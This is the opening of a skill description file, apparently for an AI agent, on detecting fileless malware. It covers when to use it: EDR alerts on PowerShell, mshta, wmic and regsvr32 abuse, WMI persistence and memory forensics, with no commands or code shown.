detecting-fileless-malware-techniques
Installation
SKILL.md
Detecting Fileless Malware Techniques
When to Use
- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals malicious code but no corresponding files exist on the filesystem
Do not use for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.